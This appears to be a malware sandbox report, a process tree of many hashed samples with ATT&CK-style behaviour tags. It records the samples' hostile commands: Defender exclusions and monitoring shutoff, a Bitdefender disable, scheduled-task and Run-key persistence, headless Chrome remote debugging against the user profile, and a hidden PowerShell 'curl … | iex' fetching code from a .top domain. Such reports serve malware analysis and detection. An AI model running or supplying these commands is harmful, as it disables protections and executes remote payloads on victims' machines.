    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UzissEB.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:6288
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UzissEB" /XML "C:\Users\Admin\AppData\Local\Temp\tmp53F2.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6268
- - C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
    "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
    3⤵
    PID:2588
- C:\Users\Admin\Downloads\sieben\e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe
  "C:\Users\Admin\Downloads\sieben\e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3984
- C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
  "C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5532
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3912
- C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
  "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5504
- - C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
    "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "pdfdocument" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Excelworkbook.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:8756
- C:\Users\Admin\Downloads\sieben\c40b21462fa3c5ebbed41befc33078f7453e4ed5e2594a815103c1efe70d6327.exe
  "C:\Users\Admin\Downloads\sieben\c40b21462fa3c5ebbed41befc33078f7453e4ed5e2594a815103c1efe70d6327.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:8308
- C:\Users\Admin\Downloads\sieben\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe
  "C:\Users\Admin\Downloads\sieben\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2940
- - C:\Users\Admin\Downloads\sieben\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe
    "C:\Users\Admin\Downloads\sieben\c9ff72b5be41b4298e4d202ec333d6e9cf80589f4112685e5040fcadd79b9605.exe"
    3⤵
    PID:2112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 224
      4⤵
      Program crash
      PID:2156
- C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
  "C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6620
- - C:\Users\Admin\AppData\Local\Temp\look2.exe
    C:\Users\Admin\AppData\Local\Temp\\look2.exe
    3⤵
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    PID:7532
- - C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:8148
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\sieben\819ad25e1dfd53f40ca7d7d176c2a1abf14b16fd5325936c1390ab3001e26af9.msi"
  2⤵
  - Blocklisted process makes network request
  - Enumerates connected drives
  PID:6344
- C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
  "C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:7540
- - C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
    "C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe"
    3⤵
    PID:6532
- C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe
  "C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7488
- - C:\Users\Admin\AppData\Local\Glagolitic\flexuosely.exe
    "C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe"
    3⤵
    PID:8424
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe"
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8424 -s 724
      4⤵
      Program crash
      PID:5224
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\sieben\070a2f1a6ceb8c81da86490d87b6976b0ddcef9eed60d60cc7768649afec9587.js"
  2⤵
  PID:7556
- C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
  "C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7060
- - C:\Users\Admin\AppData\Local\Temp\is-EQQ4L.tmp\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-EQQ4L.tmp\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp" /SL5="$203A8,3064560,844800,C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:7020
  - - C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe
      "C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:7732
    - - C:\Users\Admin\AppData\Local\Temp\is-KTEAS.tmp\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KTEAS.tmp\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.tmp" /SL5="$303A8,3064560,844800,C:\Users\Admin\Downloads\sieben\22ee40c14dcd7013d54483f24ac213921b6b7c36536c26c1115a364e10007635.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:7780
      - C:\Windows\system32\timeout.exe
        
        "timeout" 9
        6⤵
        Delays execution with timeout.exe
        
        PID:4516
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
        6⤵
        
        PID:2876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:6648
        
        C:\Windows\system32\find.exe
        
        find /I "wrsa.exe"
        7⤵
        
        PID:7092
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
        6⤵
        
        PID:2936
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        
        PID:5156
        
        C:\Windows\system32\find.exe
        
        find /I "opssvc.exe"
        7⤵
        
        PID:7520
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
        6⤵
        
        PID:7692
- C:\Users\Admin\Downloads\sieben\9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d.exe
  "C:\Users\Admin\Downloads\sieben\9ff724fb4c48b8da74c98b621cddff271942047617f04443ba3b1ed0b8f70d4d.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7828
- C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
  "C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7612
- C:\Users\Admin\Downloads\sieben\8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe
  "C:\Users\Admin\Downloads\sieben\8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6604
- C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
  "C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:8400
- - C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
    "C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe"
    3⤵
    PID:8812
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=50032 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:7664
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe50e0cc40,0x7ffe50e0cc4c,0x7ffe50e0cc58
      4⤵
      PID:7692
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,18432717909286594469,16464584688592181336,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2004 /prefetch:2
      4⤵
      PID:8412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1540,i,18432717909286594469,16464584688592181336,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2120 /prefetch:3
      4⤵
      PID:3984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2300,i,18432717909286594469,16464584688592181336,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2356 /prefetch:8
      4⤵
      PID:7108
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1824
    3⤵
    - Program crash
    PID:8544
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1916
    3⤵
    - Program crash
    PID:4760
- C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe
  "C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
  2⤵
  PID:8104
- - C:\Users\Admin\AppData\Local\Temp\is-DRGRS.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-DRGRS.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp" /SL5="$1041C,6101517,54272,C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
    3⤵
    PID:7156
- C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe
  "C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
  2⤵
  PID:8080
- - C:\Users\Admin\AppData\Local\Temp\is-0AM8H.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-0AM8H.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp" /SL5="$1041E,6101517,54272,C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
    3⤵
    PID:8024
- C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
  "C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe"
  2⤵
  PID:6684
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 1284
    3⤵
    - Program crash
    PID:9068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 1236
    3⤵
    - Program crash
    PID:9088
- C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
  "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
  2⤵
  PID:3512
- - C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
    "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
    3⤵
    PID:8168
- C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
  "C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe"
  2⤵
  PID:6972
- - C:\Users\Admin\AppData\Local\Temp\onefile_6972_133832250451910317\dc.exe
    C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
    3⤵
    PID:8696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:8856
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\sieben\2b529b5727c675ae8c3c8c5df9916c9b1c192dfe9faf54c5fb367d02b4983755.js"
  2⤵
  PID:9052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://tubuz3ubhz222.top/1.php?s=mints13 |iex"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7364
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\sieben\2b529b5727c675ae8c3c8c5df9916c9b1c192dfe9faf54c5fb367d02b4983755.js"
  2⤵
  PID:9056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://tubuz3ubhz222.top/1.php?s=mints13 |iex"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7308
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\sieben\1e4761f2536f5087e3908bcbc6e1de3ba2bd51c278cea6f33033af35535ea777.jar"
  2⤵
  PID:6620
- - C:\Windows\SYSTEM32\attrib.exe
    attrib +H C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1738751468117.tmp
    3⤵
    - Views/modifies file attributes
    PID:8608
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1738751468117.tmp" /f"
    3⤵
    PID:9096
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files\Java\jre-1.8\bin\javaw.exe -jar C:\Users\Admin\AppData\Roaming\Microsoft\.tmp\1738751468117.tmp" /f
      4⤵
      PID:7204
- C:\Users\Admin\Downloads\sieben\0bbff62a45fc9776575ed143af2d7db332e2781d7e3de56eb3ff48c25d0c7b46.exe
  "C:\Users\Admin\Downloads\sieben\0bbff62a45fc9776575ed143af2d7db332e2781d7e3de56eb3ff48c25d0c7b46.exe"
  2⤵
  PID:7532
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\sieben\205901f209731db929cc89e93d986dd5025aabc25c57ad4e342ba21d175aab96.vbs"
  2⤵
  PID:8344
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\Users\Admin\Downloads\sieben\205901f209731db929cc89e93d986dd5025aabc25c57ad4e342ba21d175aab96.vbs" /elevated
    3⤵
    PID:8484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6160
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Bitdefender\Bitdefender 2025\bdnserv.exe" -disable
      4⤵
      PID:8064
- C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
  "C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe"
  2⤵
  PID:8640
- - C:\Users\Admin\AppData\Local\Temp\look2.exe
    C:\Users\Admin\AppData\Local\Temp\\look2.exe
    3⤵
    PID:5080
- - C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    3⤵
    PID:7076
- C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
  "C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe"
  2⤵
  PID:8788
- - C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
    "C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe"
    3⤵
    PID:6452
- C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe
  "C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe" C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
  2⤵
  PID:8452
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Users\Admin\Downloads\sieben\91ce11dba631a9613d7c96409db89bf0cc358eff124632ad56f25fd6b372b070.exe" C:\Users\Admin\Downloads\sieben\164f6ad21e14ac4166a6fc80719fd681eb66cd6bcaff3e683fc7c5391be35729.exe
    3⤵
    PID:6508
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8452 -s 704
    3⤵
    - Program crash
    PID:7728
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\sieben\070a2f1a6ceb8c81da86490d87b6976b0ddcef9eed60d60cc7768649afec9587.js"
  2⤵
  PID:5836
- C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
  "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
  2⤵
  PID:8372
- - C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
    "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
    3⤵
    PID:6424
- C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
  "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
  2⤵
  PID:8176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UzissEB.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2576
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UzissEB" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3355.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4588
- - C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe
    "C:\Users\Admin\Downloads\sieben\e79f272da50c989ace58144be6791c62d1fed9067c29a43f39cc72986ff0d474.exe"
    3⤵
    PID:8936
- C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
  "C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe"
  2⤵
  PID:7624
- C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
  "C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe"
  2⤵
  PID:8332
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:2028
- C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
  "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
  2⤵
  PID:3352
- - C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
    "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
    3⤵
    PID:6744
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "pdfdocument" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Excelworkbook.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4092
  - - C:\Users\Admin\AppData\Roaming\SubDir\Excelworkbook.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Excelworkbook.exe"
      4⤵
      PID:3044
